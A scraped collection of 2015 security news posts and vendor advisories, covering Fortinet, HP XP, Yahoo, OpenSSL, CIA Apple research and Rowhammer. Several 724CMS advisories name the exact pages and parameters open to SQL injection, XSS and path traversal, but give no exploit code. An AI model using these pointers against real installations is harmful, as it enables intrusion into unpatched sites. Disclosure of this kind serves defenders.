one from Mitre yet. 2015-03-05: Fortinet informed us that they were discussing when they were going to release the fix/update, and that they will provide us an ETA tomorrow. 2015-03-06: Fortinet informed us that their new ETA is March 11th, 2015. They clarify this is not a fixed date. 2015-03-11: Fortinet informed us that they postponed to the end of the week or next week the ETA of FortiOS 5.2.3. 2015-03-13: Core Security asks Fortinet about the status of the ETA for the fix/update. Additionally we recommended not to release it on a Friday in order to give the affected users the required time to apply the fix. 2015-03-16: Core Security asks Fortinet if they could send us their estimated ETA for the fix/update. 2015-03-16: Fortinet informed us that the current ETA is March 17th or March 18th. 2015-03-18: Advisory CORE-2015-0006 published. 9. References [1] http://www.fortinet.com/. [2] http://support.microsoft.com/kb/2458544. [3] https://github.com/CoreSecurity/sentinel. [4] http://docs-legacy.fortinet.com/cb/html/index.html#page/FOS_Cookbook/Authentication/FSSO-IBP.html. [5] http://www.fortiguard.com/advisory/FG-IR-15-006/. 10. About CoreLabs CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. About Core Security Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. Disclaimer The contents of this advisory are copyright (c) 2014 Core Security and (c) 2014 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. PGP/GPG Keys This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. Source
  13. HP Security Bulletin HPSBST03298 1 - Potential security vulnerabilities have been identified with HP XP Service Processor Software for Windows. These vulnerabilities could be exploited resulting in a variety of outcomes. Code: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04600552 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04600552 Version: 1 HPSBST03298 rev.1 - HP XP Service Processor Software for Windows, Multiple Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2015-03-13 Last Updated: 2015-03-13 - ----------------------------------------------------------------------------- - --- Potential Security Impact: Multiple vulnerabilities Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP XP Service Processor Software for Windows. These vulnerabilities could be exploited resulting in a variety of outcomes. References: SSRT101826 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The following HP XP Service Processor Software for Windows is affected: HP XP7 HP XP10000 HP XP12000 HP XP20000 HP XP24000 HP XP P9500 BACKGROUND For a PGP signed version of this security bulletin please write to: security-alert@hp.com Microsoft has published Security Information Bulletins since January 2009. This bulletin presents all of the necessary patches and updates for HP XP Service Processor Software in a cummulative format. This information is updated monthly. Updating the HP XP Service Processor Software can be performed without interference or distruption to data flow on the XP product. RESOLUTION HP has made a web-based spread sheet available which lists all updates to the HP XP Service Processor Software that runs on the Microsoft Windows Operating System. The OS versions include Windows 7, Window Vista (64 and 32 bit) and Windows XP. The document may be downloaded from here: HP Insight Management - Overview In this HP Enterprise Information LIbrary , Select 'Storage' at the top, In the 'Products and Solutions' column, select 'XP Storage', In the 'Information Type' column, select only 'Service and Maintenance'. The HP XP Service Processor (SVP) OS Security Patch Summary Sheet may be downloaded to your desktop. HISTORY Version:1 (rev.1) - 13 March 2015 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: HP: Subscribe today Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned here in may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux) iEYEARECAAYFAlUHov8ACgkQ4B86/C0qfVnbrgCg4oVyYhIvPf8/mkS/IwjWrMRg blEAn3uS87tqYInkFZtz8QNOjlVcU7l0 =6XaT -----END PGP SIGNATURE----- Source: http://dl.packetstormsecurity.net/1503-advisories/HPSBST03298-1.txt
  14. 724CMS 5.01 / 4.59 / 4.01 / 3.01 Information Leakage *724CMS 5.01 Multiple Information Leakage Security Vulnerabilities* Exploit Title: 724CMS Multiple Information Leakage Security Vulnerabilities Vendor: 724CMS Product: 724CMS Vulnerable Versions: 3.01 4.01 4.59 5.01 Tested Version: 5.01 Advisory Publication: March 14, 2015 Latest Update: March 14, 2015 Vulnerability Type: Information Exposure [CWE-200] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N) (legend) Impact Subscore: 2.9 Exploitability Subscore: 10.0 Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore] *Suggestion Details:* *(1) Vendor & Product Description:* *Vendor:* 724CMS Enterprise *Product & Vulnerable Versions:* 724CMS 3.01 4.01 4.59 5.01 *Vendor URL & download:* 724CMS can be got from here, http://724cms.com/ *Product Introduction Overview:* 724CMS is a content management system (CMS) that has large customers spread in Canada, Japan, Korean, the United States and many others. It allows publishing, editing and modifying content, organizing, deleting as well as maintenance from a central interface. Meanwhile, 724CMS provides procedures to manage workflow in a collaborative environment. *(2) Vulnerability Details:* 724CMS web application has a security bug problem. It can be exploited by information leakage attacks - Full Path Disclosure (FPD). This may allow a remote attacker to disclose the software's installation path. While such information is relatively low risk, it is often useful in carrying out additional, more focused attacks. Several 724CMS products vulnerabilities have been found by some other bug hunter researchers before. 724CMS has patched some of them. NVD is the U.S. government repository of standards based vulnerability management data (This data enables automation of vulnerability management, security measurement, and compliance (e.g. FISMA)). It has published suggestions, advisories, solutions related to 724CMS vulnerabilities. *(2.1)* The first code programming flaw occurs at "index.php" page with "&Lang", "&ID" parameters. *(2.2)* The second code programming flaw occurs at "section.php" page with "&Lang", "&ID" parameters. *References:* http://tetraph.com/security/information-leakage-vulnerability/724cms-5-01-information-leakage-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/724cms-501-information-leakage-security.html http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-information-leakage-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-information-leakage-security-vulnerabilities/ https://infoswift.wordpress.com/2015/03/14/724cms-5-01-information-leakage-security-vulnerabilities/ http://marc.info/?l=full-disclosure&m=142576280203098&w=4 http://en.hackdig.com/wap/?id=17055 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/tetraphibious 724CMS 5.01 / 4.59 / 4.01 / 3.01 Directory Traversal *724CMS 5.01 Directory (Path) Traversal Security Vulnerabilities* Exploit Title: 724CMS /section.php Module Parameter Directory Traversal Security Vulnerabilities Vendor: 724CMS Product: 724CMS Vulnerable Versions: 3.01 4.01 4.59 5.01 Tested Version: 5.01 Advisory Publication: March 14, 2015 Latest Update: March 14, 2015 Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') [CWE-22] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend) Impact Subscore: 6.4 Exploitability Subscore: 10.0 Discover and Author: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore] *Recommendation Details:* *(1) Vendor & Product Description:* *Vendor:* 724CMS Enterprise *Product & Vulnerable Versions:* 724CMS 3.01 4.01 4.59 5.01 *Vendor URL & download:* 724CMS can be bargained from here, http://724cms.com/ *Product Introduction Overview:* "724CMS is a content management system (CMS) that has customers spread in Canada, Japan, Korean, the United States, European and many others. It allows publishing, editing and modifying content, organizing, deleting as well as maintenance from a central interface. Meanwhile, 724CMS provides procedures to manage workflow in a collaborative environment." "A CMS helps you create and store content in a shared repository. It then manages the relationships between content items for you (e.g. keeping track of where they fit into the site hierarchy). Finally, it ensures that each content item is connected to the right style sheet when it comes to be published. Some CMSs also provide facilities to track the status of content items through editorial processes and workflows." *(2) Vulnerability Details:* 724CMS web application has a security bug problem. It can be exploited by Directory Traversal - Local File Include (LFI) attacks. A local file inclusion (LFI) flaw is due to the script not properly sanitizing user input, specifically path traversal style attacks (e.g. '../../') supplied to the parameters. With a specially crafted request, a remote attacker can include arbitrary files from the targeted host or from a remote host . This may allow disclosing file contents or executing files like PHP scripts. Such attacks are limited due to the script only calling files already on the target host. Several 724CMS products vulnerabilities have been found by some other bug hunter researchers before. 724CMS has patched some of them. The MITRE Corporation is a not-for-profit company that operates multiple federally funded research and development centers (FFRDCs), which provide innovative, practical solutions for some of our nation's most critical challenges in defense and intelligence, aviation, civil systems, homeland security, the judiciary, healthcare, and cybersecurity. It has published suggestions, advisories, solutions details related to 724CMS vulnerabilities. *(2.1) *The first cipher programming flaw occurs at "/section.php" page with "&Module" parameter. *References:* http://www.tetraph.com/security/directory-traversal-vulnerability/724cms-5-01-directory-path-traversal-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/724cms-501-directory-path-traversal.html http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-directory-path-traversal-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-directory-path-traversal-security-vulnerabilities/ https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-directory-path-traversal-security-vulnerabilities/ http://marc.info/?a=139222176300014&r=1&w=4 http://en.hackdig.com/wap/?id=17404 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/justqdjing 724CMS 5.01 / 4.59 / 4.01 / 3.01 SQL Injection *724CMS 5.01 Multiple SQL Injection Security Vulnerabilities* Exploit Title: 724CMS Multiple SQL Injection Security Vulnerabilities Vendor: 724CMS Product: 724CMS Vulnerable Versions: 3.01 4.01 4.59 5.01 Tested Version: 5.01 Advisory Publication: March 14, 2015 Latest Update: March 14, 2015 Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend) Impact Subscore: 6.4 Exploitability Subscore: 10.0 Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore] *Recommendation Details:* *(1) Vendor & Product Description:* *Vendor:* 724CMS Enterprise *Product & Vulnerable Versions:* 724CMS 3.01 4.01 4.59 5.01 *Vendor URL & download:* 724CMS can be gain from here, http://724cms.com/ *Product Introduction Overview:* "724CMS is a content management system (CMS) that has customers spread in Canada, Japan, Korean, the United States, European and many others. It allows publishing, editing and modifying content, organizing, deleting as well as maintenance from a central interface. Meanwhile, 724CMS provides procedures to manage workflow in a collaborative environment." "A CMS helps you create and store content in a shared repository. It then manages the relationships between content items for you (e.g. keeping track of where they fit into the site hierarchy). Finally, it ensures that each content item is connected to the right style sheet when it comes to be published. Some CMSs also provide facilities to track the status of content items through editorial processes and workflows." *(2) Vulnerability Details:* 724CMS web application has a security bug problem. It can be exploited by SQL Injection attacks. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. Several 724CMS products vulnerabilities have been found by some other bug hunter researchers before. 724CMS has patched some of them. The MITRE Corporation is a not-for-profit company that operates multiple federally funded research and development centers (FFRDCs), which provide innovative, practical solutions for some of our nation's most critical challenges in defense and intelligence, aviation, civil systems, homeland security, the judiciary, healthcare, and cybersecurity. It has phase, votes, comments and proposed details related to 724CMS vulnerabilities. *(2.1)* The first cipher programming flaw occurs at "/index.php" page with "&Lang", "&ID" parameters. *(2.2) *The second cipher programming flaw occurs at "/section.php" page with "&Lang", "&ID" parameters. *References:* http://www.tetraph.com/security/sql-injection-vulnerability/724cms-5-01-multiple-sql-injection-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/724cms-501-multiple-sql-injection.html http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-multiple-sql-injection-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-multiple-sql-injection-security-vulnerabilities/ https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-multiple-sql-injection-security-vulnerabilities/ https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01766.html http://marc.info/?a=139222176300014&r=1&w=4 http://en.1337day.com/exploit/23308 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/tetraphibious 724CMS 5.01 / 4.59 / 4.01 / 3.01 Cross Site Scripting *724CMS 5.01 Multiple XSS (Cross-site Scripting) Security Vulnerabilities* Exploit Title: 724CMS Multiple XSS (Cross-site Scripting) Security Vulnerabilities Vendor: 724CMS Product: 724CMS Vulnerable Versions: 3.01 4.01 4.59 5.01 Tested Version: 5.01 Advisory Publication: March 15, 2015 Latest Update: March 15, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend) Impact Subscore: 2.9 Exploitability Subscore: 8.6 Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore] *Recommendation Details:* *(1) Vendor & Product Description:* *Vendor:* 724CMS Enterprise *Product & Vulnerable Versions:* 724CMS 3.01 4.01 4.59 5.01 *Vendor URL & download:* 724CMS can be purchased from here, http://724cms.com/ *Product Introduction Overview:* "724CMS is a content management system (CMS) that has customers spread in Canada, Japan, Korean, the United States, European and many others. It allows publishing, editing and modifying content, organizing, deleting as well as maintenance from a central interface. Meanwhile, 724CMS provides procedures to manage workflow in a collaborative environment." "A CMS helps you create and store content in a shared repository. It then manages the relationships between content items for you (e.g. keeping track of where they fit into the site hierarchy). Finally, it ensures that each content item is connected to the right style sheet when it comes to be published. Some CMSs also provide facilities to track the status of content items through editorial processes and workflows." *(2) Vulnerability Details:* 724CMS web application has a security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. Several 724CMS products vulnerabilities have been found by some other bug hunter researchers before. 724CMS has patched some of them. The MITRE Corporation is a not-for-profit company that operates multiple federally funded research and development centers (FFRDCs), which provide innovative, practical solutions for some of our nation's most critical challenges in defense and intelligence, aviation, civil systems, homeland security, the judiciary, healthcare, and cybersecurity. It has published suggestions, advisories, solutions details related to 724CMS vulnerabilities. *(2.1)* The first code programming flaw occurs at "/index.php" page with "&Lang" parameter. *(2.2) *The second code programming occurs at "/section.php" page with "&Lang", "&ID", "&Nav" parameters. *References:* http://www.tetraph.com/security/xss-vulnerability/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/724cms-501-multiple-xss-cross-site.html http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/ https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/ http://marc.info/?l=full-disclosure&m=142576259903051&w=4 https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01737.html http://en.hackdig.com/?16117.htm -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/tetraphibious
  15. Yahoo! has offered $24,000 to a security researcher for finding out and reporting three critical security vulnerabilities in its products including Yahoo! Stores and Yahoo!-hosted websites. While testing all the company's application, Mark Litchfield, a bug bounty hunter who often works with different companies, discovered three critical vulnerabilities in Yahoo!'s products. All the three vulnerabilities have now been fixed by Yahoo!. THREE CRITICAL SECURITY VULNERABILITIES The first and most critical vulnerability gives hackers full administrator access to Yahoo!'s e-commerce platform, Yahoo! Small Business, a portal that allows small business owners to create their own web stores through Yahoo! and sell merchandise. According to the researcher, the flaw in the service allowed him to fully administrator any Yahoo store and thereby gain access to customers' personally identifiable information, including names, email addresses, telephone numbers. BUG ALLOWS FREE SHOPPING Beside allowing hackers full admin access to the web stores, the vulnerability could also leverage an attacker to rig a user-run eCommerce web store to let them shop for free, or at a huge discount, Litchfield claimed. A separate but related vulnerability in Yahoo! Stores, second flaw discovered by Litchfield, allows an unauthorized user to edit Yahoo-hosted stores through the app, thereby creating a means for hackers to hijack an online website store. Last but not the least, Litchfield discovered a critical vulnerability in Yahoo’s Small Business portal that allows hackers to seize administrative access to Yahoo!-hosted websites and gain full, unauthorized access to them. The Internet giant patched all the three bugs two weeks ago after Litchfield publicly released details and proof of concepts for the exploits on Bug Bounty HQ, a community for Bug Bounties website, established by Litchfield last month for fellow hunters to share their findings. 'ON DEMAND PASSWORD' At recent SXSW session, Yahoo! launched 'on-demand passwords,' which it says will eliminate the need for you to ever remember your email password. Whenever you need it, the company will send you a OTP (one time password) via SMS to your mobile phone. It's sort of two-factor authentication—without the first factor involved, as there is no need of any log-in password to enter by a user. In order to opt-in for the feature follow some simple steps: Sign in to your Yahoo email account. Click on your name at the top right corner to access your account information page. Choose Security in the sidebar. Click on the slider for on-demand passwords, in order to opt-in. Enter your phone number and Yahoo will send you a verification code. Enter the code. Now, next time whenever you will sign in into your email account, Yahoo will send a password via an SMS to your phone when you need it. Also, the end-to-end email encryption that Yahoo! promised will be available soon by the end of this year. The company gave its first demonstration of the locked down messaging system at SXSW session, and it is also delivering early source code for security researchers to analyze. Source
  16. Full materials and proof of concept code has been released for the Security Explorations discovery of various Google app engine java security sandbox bypasses. Download pack: Download: Google App Engine Java Security Sandbox Bypasses ? Packet Storm
  17. The Cyber Security Challenge final has launched, tasking 42 amateur white hats to regain control of a naval gun system on board HMS Belfast as a part of a simulated cyber attack by the 'Flag Day Associates' hacktivist group. The final challenge is the brainchild of experts from GCHQ, the National Crime Agency, Lockheed Martin, Airbus Group, PGI, C3IA and Palo Alto Networks (in partnership with BT). The finalists will attempt to regain control of a gun system which has been hacked remotely and forced to target London's City Hall. Contestants will also be required to find similar security holes in a simulated water treatment and manufacturing facility using industry-standard tools, such as the Kali Linux distribution. The winner will be crowned on Friday. The simulation is the final round in the fifth Cyber Security Challenge, which has seen "thousands" of entrants combat the Flag Day Associates in a variety of fictional situations. The challenge is designed to help businesses and government departments spot talented individuals and recruit them into cyber security. Stephanie Daman, CEO of the Cyber Security Challenge, said that many of 2014's finalists now have cyber security jobs. "Around half of last year's finalists are already in their first cyber security jobs, whilst the majority of the rest are well on their way, taking training courses, accreditations or internships to boost their CVs. There is no reason why all 42 of our finalists today can't follow in their footsteps." Past winners include 19-year-old student William Shackleton and chemist Stephen Miller. Cabinet Office minister Francis Maude listed the high turnout and success of participants finding cyber security jobs as proof of the challenge's success. "Today's competition highlights the very best new cyber security talent as they are challenged by a set of exciting and innovative scenarios developed by GCHQ alongside industry experts," he said. "Government and business need skilled and talented people to feed the demand for better cyber security in the UK. "This competition is the biggest and best yet, and events like this play an important role in providing the next generation of cyber professionals." The challenge final follows a wider push by the UK government to better defend critical infrastructure systems against cyber attacks. The UK and US governments announced plans to mount a series of simulated cyber war games in January with the intention of bolstering critical infrastructure systems. The initiatives follow warnings that the cyber threat facing critical infrastructure is growing. The US Industrial Control Systems Cyber Emergency Response Team revealed on Thursday that US industrial control systems were hit by cyber attacks at least 245 times over a 12-month period. Source
  18. Intel Security (fomerly McAfee) has announced a security platform designed to protect both new and legacy infrastructure within the electric power grid. Dubbed Intel Security Critical Infrastructure Protection (CIP), the solution was developed in collaboration with the Department of Energy-funded Discovery Across Texas smart grid project including deployment at Texas Tech University, and is a joint project of Intel Security and Wind River. Intel Security CIP works by separating the security management functions of the platform from the operational applications, allowing the operational layer to be secured, monitored and managed, the company explained. According to Intel Security, the security platform can be applied with little or no changes to business processes or application software, and can be retrofitted onto many existing systems. Features include protection such as device identity, malware protection, data protection and resiliency. Intel believes the solution can be leveraged beyond the power grid and could be equally effective for departments of defense, oil and gas firms, medical applications, and other areas. According to a study sponsored by Intel, “In the Dark: Crucial Industries Confront Cyberattacks,” of the 200 CIP executives surveyed globally, 32% had not adopted special security measures for smart grid controls. Yet 33% anticipated a major cybersecurity incident within 12 months. Related: Learn More at the 2015 ICS Cyber Security Conference “The risk of cyberattacks on critical infrastructure is no longer theoretical, but building security into the grid is challenging due to the amount of legacy infrastructure and the importance of availability of service,” Lorie Wigle, Vice President of Internet of Things Security Solutions for Intel Security, said in a statement. “Traditional security measures such as patching and rebooting are often inappropriate for the grid, so we set out to design something entirely different that could be non-invasive but simultaneously robust “From December 2013 to January 2015, the Intel Security CIP was in a field trial at Texas Tech University, where it performed as required by NIST standards and withstood penetration testing, as well as protected the synchrophasor applications during the Heartbleed vulnerability and Havex attacks,” said Milton Holloway, President & COO, Center for the Commercialization of Electric Technologies. “This project was an outstanding example of a successful public-private partnership in that it produced technologies that are market-ready. What could be a better outcome of a demonstration project?” Sursa: securityweek.com
  19. Funding from the Core Infrastructure Initiative has helped the maintainers of OpenSSL, one of the Internet’s most-deployed pieces of open source software, begin to get the crypto implementation on its feet. Despite its ubiquity, OpenSSL has historically been under-funded and under-resourced, though no one outside those close to the project knew how dire the situation was until Heartbleed and other Internet-wide bugs started experts looking closely at the security of open source software. With funding from CII and other corners of the Internet, full time help has been hired to maintain the regular flow of patches and feature upgrades, and since last spring, get the code base ship-shape for a full-fledged security audit. NCC Group Cryptography Services, the security company behind the first phase of the TrueCrypt audit, Monday announced that it, in partnership with the Linux Foundation, will conduct an audit of OpenSSL, looking at key components likely to put installations at risk in the event of a critical vulnerability. “A number of folks who have contributed their free time and professional time, kept OpenSSL growing,” said Tom Ritter, principal security engineer at NCC. “A lot of those contributions were around making OpenSSL more efficient and improving speed—and security improvements. Now, being able to have people work on it fulltime in a maintenance capacity goes long way. Any project that old accumulates technical debt takes that takes time and effort to pay down. Having fulltime focus on bug maintenance is super important.” OpenSSL’s code cleanup paved the way for the audit, Ritter said. Engineers spent significant time re-reading areas of code of most concern—and fixing bugs along the way—in order to make the code more reliable, consistent and secure. Ritter said work on the audit should begin shortly, and the first set of results will be made available mid-Summer after OpenSSL has had time to review the results and patch. Ritter said the audit will be concentrated only in certain critical areas of the OpenSSL codebase, and will not be comprehensive. In scope are the TLS stacks, covering protocol flow, state transitions, and memory management. The BIOS, high-profile crypto algorithms and fuzzing of the ASN.1 and x509 parsers will also happen, Ritter said, adding that input and feedback from the current OpenSSL team also contributed to what ultimately ended up in scope for the audit. “We chose areas around OpenSSL where a flaw here might be of higher severity than other areas,” Ritter said. “The types of things we’ll be looking for are things such as protocol mishandling or state transitions, things like that, even timing attacks in crypto algorithms, or memory corruption that would yield a denial of service condition or remote code execution. Those are the types of bugs looking for. If find one of those, it has the possibility of being fairly critical.” Unlike the TrueCrypt audit where one of the stated goals was to determine whether the popular encryption software had been backdoored, that isn’t necessarily the case with OpenSSL, Ritter said. “You haven’t heard much about [backdoors] in OpenSSL,” Ritter said. “Our real goal is to find any sort of exploitable security concerns. I think that we’re focusing on it from the perspective of a security audit.” Expect Ritter and his team to spend plenty of time in front of large whiteboards for the next few months, tracing out function flows and diagram the code in order to support the manual and automated code review it will take to properly assess OpenSSL. And while the audit may not yield something as dramatic as Heartbleed, you can expect Ritter’s team to be looking in that direction. “Certainly looking at historical bugs in the platform gives us an idea of the types of flaws present still; it will be helpful,” Ritter said. “I’m not going to say we’re doing to go in expecting to find any particular bug in a particular area, but looking at historical bugs does guide us in certain areas as do a lot of the less high-profile bugs. Looking at just about any bug and seeing the underlying causes of it gives us a sense that if something similar is happening elsewhere, there could be a bug there.” Source
  20. Security researchers at the Central Intelligence Agency (CIA) have worked for almost decade to target security keys used to encrypt data stored on Apple devices in order to break the system. Citing the top-secret documents obtained from NSA whistleblower Edward Snowden, The Intercept blog reported that among an attempt to crack encryption keys implanted into Apple's mobile processor, the researchers working for CIA had created a dummy version of Xcode. CIA’s WEAPON TO HACK APPLE DEVICES Xcode is an Apple’s application development tool used by the company to create the vast majority of iOS apps. However using the compromised development software, CIA, NSA or other spies agencies were potentially allowed to inject surveillance backdoor into programs distributed on Apple's App Store. In addition, the custom version of Xcode could also be used to spy on users, steal passwords, account information, intercept communications, and disable core security features of Apple devices. The latest documents from the National Security Agency’s internal systems revealed that the researchers’ work was presented at its 2012 annual gathering called the "Jamboree" -- CIA sponsored secretive event which has run for nearly a decade -- at a Lockheed Martin facility in northern Virginia. KEYLOGGER FOR MAC COMPUTERS According to the report, "essential security keys" used to encrypt data stored on Apple’s devices have become a major target of the research team. Overall, the U.S. government-sponsored researchers are seeking ways to decrypt this data, as well as penetrate Apple's firmware, using both "physical" and "non-invasive" techniques. In addition to this, the security researchers also presented that how they successfully modified the OS X updater -- a program used to deliver updates to laptop and desktop computers -- in an attempt to install a "keylogger" on Mac computers. HACKING ENCRYPTION KEYS Another presentation from 2011 showed different techniques that could be used to hack Apple's Group ID (GID) -- one of the two encryption keys that Apple places on its iPhones. One of the techniques involved studying the electromagnetic emissions of the GID and the amount of power used by the iPhone’s processor in order to extract the encryption key, while a separate method focused on a "method to physically extract the [Apple's] GID key." Although the documents do not specify how successful or not these surveillance operations have been against Apple, it once again provoke the ongoing battle between spy agencies and tech companies, as well as the dishonesty of the US government. 'SPIES GONNA SPY' On one hand, where President Barack Obama criticized China for forcing tech companies to install security backdoors for the purpose of government surveillance. On the other hand, The Intercept notes that China is just following America's lead, that’s it. "Spies gonna spy," said Steven Bellovin, a computer science professor at Columbia University and former chief technologist for the FTC. "I’m never surprised by what intelligence agencies do to get information. They’re going to go where the info is, and as it moves, they’ll adjust their tactics. Their attitude is basically amoral: whatever works is OK." We have already reported about NSA and GCHQ’s various surveillance programs including PRISM, XkeyScore, DROPOUTJEEP, and many more. Source
  21. Rowhammer: NaCl Sandbox Escape PoC Rowhammer: Linux Kernel Privilege Escalation PoC Software, from web apps, to operating systems to firmware, has been abused and exploited every which way from Sunday for decades by both researchers and attackers. Now, it is hardware’s turn in the spotlight, as researchers have published details of a new method for exploiting a problem with some DRAM memory devices that can allow attackers to get low-level access to target machines. The problem is being called “rowhammer”, as it’s a method for repeatedly hammering on rows of cells of memory in DRAM devices to induce cells to flip from one state to another. Using a new technique to exploit the rowhammer issue, researchers at Google were able to produce these bit flips in cells and gain kernel-level privileges. Security researchers say the technique is some of the more important work done on exploitation in recent years and could affect a huge number of laptops and desktop machines. “[it] is a brilliant attack and because it’s a hardware flaw, there are really no ways to patch it,” said Alfredo Ortega, a longtime security researcher and co-founder of Groundworks Technologies. Researcher Mark Seaborn on Monday published a detailed technical explanation of techniques to exploit the rowhammer issue, which was described earlier in an academic paper by researchers from Intel and Carnegie Mellon University. The basic concept behind rowhammer relies on the fact that the cells of memory on DRAM devices have become closer and closer together over time, meaning that it has become more difficult to prevent electrons from jumping from one cell to another. By accessing target cells in DRAM over and over again, an attacker can disturb a cell adjacent to the target cells, causing it to “bit flip” under some circumstances. “‘Rowhammer’ is a problem with some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows. We tested a selection of laptops and found that a subset of them exhibited the problem. We built two working privilege escalation exploits that use this effect. One exploit uses rowhammer-induced bit flips to gain kernel privileges on x86-64 Linux when run as an unprivileged userland process,” Seaborn wrote in his post. “When run on a machine vulnerable to the rowhammer problem, the process was able to induce bit flips in page table entries (PTEs). It was able to use this to gain write access to its own page table, and hence gain read-write access to all of physical memory.” Seaborn tested his technique on 29 different machines with several different CPUs and DRAM from several vendors and observed a bit flip in 15 cases. However, he stressed that the lack of an observed bit flip does not mean that the DRAM isn’t necessarily exploitable. “While an absence of bit flips during testing on a given machine does not automatically imply safety, it does provide some baseline assurance that causing bit flips is at least difficult on that machine,” Seaborn said. 